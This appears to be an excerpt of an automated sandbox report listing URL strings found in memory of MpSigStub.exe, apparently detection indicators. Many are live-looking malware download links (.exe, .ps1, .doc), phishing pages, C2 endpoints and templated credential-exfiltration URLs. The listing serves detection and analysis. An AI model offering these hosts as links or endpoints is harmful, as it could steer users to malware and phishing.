Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=x
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://smg-blackhat.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://smpcollection.ir/poss/doc/purchase.doc
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://sndy2kungglobalinvestmentgooglednsaddres.duckdns.org/office/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://sneak.bananamikubanana.com/pc/page/set_reg.php?afrno=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://so.163.com/search.php?q=
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://so1.5k5.net/interface?action=install&p=
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://soft.trustincash.com/url/config.xml
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://softlog.twoshadow.cn/api/data/sync
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://softthrifty.com/security.jsp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://sokyoss.drelshazly.com:8080/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://solk.seamscreative.info:8080/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://sommernph.com/og/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://sondervisual.com.ar/cnt.php?id=7314582
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://sonyxweb.ru
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://soriya.kr
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://sploogetube.mobi/x.ps1
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://spotdewasa.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://spotvideoporno.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://sprout17.blond.av4610.net/set_inf.php?id=movie_ef.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://spy-kill.com/bho_adult.txt
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=GKL&key=%s&v=%s&email=%s
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=fkl&key=%s&v=%s
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/download/141/setup.exe
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/load.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://spywprotect.com/purchase
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://squash13.navy.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://srlvonf.info/youtube.xpi
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://srmvx.com.br/uploads/
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://srv166997.hoster-test.ru/decidedly/barrier/barbara/seem/phaytd.dot
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://srv87992.ht-test.ru/west/excelz/index.php
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://staging.stikbot.toys/24.gif
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://stankomeland.duckdns.org/js//share.php
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://starcorpinc.com?
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://start.abauit.com/logo.png?v7err
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://stasmaster.hut2.ru/rcv.php
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://stat.02933.com
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://stat.errclean
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://stat.openpart.ru/newtoolbar?p=qcash
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://stat.openpart.ru/newtoolbar?p=ziparchive
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://stat.t2t2.com/log/log1.asp?default&user=
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cn
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cnxv
Source: MpSigStub.exe, 00000023.00000003.18327831413.0000015B1A891000.00000004.00000001.sdmp String found in binary or memory: http://statapi.aldtop.com
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://static.hostsecureplugin.com/sdb/fd/host-secure-updater.xml
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://statisonline.casa/register.jpg
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exe
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exehttp://61.135.159.183/installer/sobar.exehttp://sky
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://stats.hosting24.com/count.php
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://status.clrsch.com/loader/
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://status.qckads.com/
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://stiags.com.mx/zjeixcphncer/nbsa_
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://stive.hopto.org/pak.dot
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://strategosvideo4.com/1547.avi.exe
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://stroylux.ro/ds/1.gif
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://stroyprivoz.ru/dokumente-vom-notar/
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://student5.lab.classroom.kingdomit.org/wp-content/rechnungs-detail
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://studiojagoda.pl/invoice-receipt/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://stumptowncreative.com/important-please-read/
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://sturfajtn.com
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: http://stwinwebservices.examsoft.com/
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://subca.crl.certum.pl/ctnca.crl0k
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://sucesores.com.mx/images/logo.gif
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://sun346.neta
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://sundsvallsrk.nu/tmp/lns.txt
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://sunrypero.cf/document5.doc
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://superdoor.ch/media/jui/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://superfast.com.sapo.pt/fotos.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://superkahn.ru:8080/index.php
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://superpuperdomain.com/count.php?ref=
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://supportwebcenter.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://sustainabletourismint.com/la)
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://svc-stats.linkury.com/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://switercom.ru/ds/26.gif
Source: MpSigStub.exe, 00000023.00000003.18343980449.0000015B1ACD2000.00000004.00000001.sdmp String found in binary or memory: http://sxload.com
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: http://sys-doctor.com
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://systemfile.online
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://systemjhockogyn.com.br/boa.php
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://t.amy
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://t.amynx.com/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://t.awcna.com/mail.jsp?dde
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://t.awcna.com/mail.jsp?js
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://t.cn
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://t.cn/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://t.co/
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://t.go4321.com
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://t.me/decovid19bot
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://t.tr2q.com
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://t.zer9g.com/
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://t.zz3r0.com/
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://tablet.doyo.cn/pop_window/pw_318_215
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://taggsalimentos.com.br/pdf/login.htm
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://talele.50megs.com/Installer/safe.zip
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://talele.50megs.com/Installer/safe.zipx
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://talk-of-the-tyne.co.uk/download
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://taobao.ha
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://taobao.haodizhi.ccx
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://te.clickpotato.tv/pte.aspx
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://te.platrium.com/pte.aspx
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://team.afcorp.afg/chr/crt-ho_30/newjflibrary
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://techwach.com
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://tecmon.hr/
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://teladea.blogspot.com
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/
Source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponse
Source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponsex:
Source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersT
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/OSoft.Services.Webservice.SystemConfigService/SystemConfigServicexk
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/QuanLyGaraOtoDataSet.xsd
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/SampleProductsDataSet.xsd
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/T
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/db_restorentDataSet.xsd
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/payrollDataSet1.xsd
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/x
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://tendancekart.com/
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://tenillar.com/ko/pos.phpmethod=post
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://tescohomegroseryandelectronicstday2store.duckdns.org/office/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://tfu.ae/readme.txt
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://thankyou.orderreceipts.square7.ch/applica.exe
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://thecoverstudio.com/modules/jmsslider/views/img/layers/app/updates.doc
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://theenterpriseholdings.com/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://thehairhive.ca/meg/retwesq.exe
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: http://theonlybookmark.com/in.cgi?11&group=adv001URLGeneral1http://google.com/install.php?time=%dTim
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://thescanwinantivirxp.com/index.php?
Source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/MyFriends.jsp
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/mail/MailCompose.jsp
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/mail/MailCompose.jsp?ToMemberId=%s
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://www.%s/searchbar.html
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.114.
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://www.114Oldest.com/zz/mm.htm
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://www.126.com/
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.17173.com/
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp String found in binary or memory: http://www.178gg.com/lianjie/
Source: MpSigStub.exe, 00000023.00000003.18402095009.0000015B1AE5E000.00000004.00000001.sdmp String found in binary or memory: http://www.180searchassistant.com/
Source: MpSigStub.exe, 00000023.00000003.18402095009.0000015B1AE5E000.00000004.00000001.sdmp String found in binary or memory: http://www.180searchassistant.com/a
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.1882361.55freehost.com/voicemail.html)
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://www.22apple.com/?utm_source=b&ch=sof&uid=
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://www.22teens.com/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://www.2345.com
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.2345.com/?18181
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp String found in binary or memory: http://www.2828hfdy.com/bak.txt
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://www.3000.ws/
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://www.31334.info/1stupload.php
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://www.3322.org/dyndns/getip
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://www.3800cc.com/
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://www.455465x.com/test/IP.asp
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://www.4dots-software.com/installmonetizer/emptyfoldercleaner.php/silentget
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.4shared.com/download/-u-Zcvyfce/SkyLinev5.exe
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://www.4shared.com/download/TZDZz2RBba/aTubeWD9.exe
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/310714d/291014_nj.exe?
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://www.4threquest.me/310714d/310714_br.exe?
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.51jetso.com
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.51jetso.com/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://www.520hack.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://www.52CPS.COM/goto/mm.Htm
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: http://www.58816.com
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://www.5qbb.com
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://www.5z8.info/--initiate-credit-card-xfer--_g5l2og_autoinstall
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/city/
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/navhtm/nav
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.6781.com/tools/#
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://www.77169.net/
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://www.7sponsor.com/
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.887766.com/hi.htm
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&lev
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://www.96333.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://www.9aaa.com
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://www.DanlodBazar.blogfa.com
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: http://www.IM-Names.com/names
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: http://www.IM-Names.com/namesa
Source: MpSigStub.exe, 00000023.00000003.18315624417.0000015B1B02C000.00000004.00000001.sdmp String found in binary or memory: http://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d
Source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp String found in binary or memory: http://www.LuckyAcePoker.com/install
Source: MpSigStub.exe, 00000023.00000003.18300098662.0000015B1C3F4000.00000004.00000001.sdmp String found in binary or memory: http://www.MalwareAlarm.com/
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.PCKeeper.com
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://www.PlanetCpp.com
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://www.PriceFountain.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://www.Social2Search.com/privacy
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://www.activision.com/games/wolfenstein/purchase.html
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://www.adserver.com
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://www.advgoogle.blogdpot.com
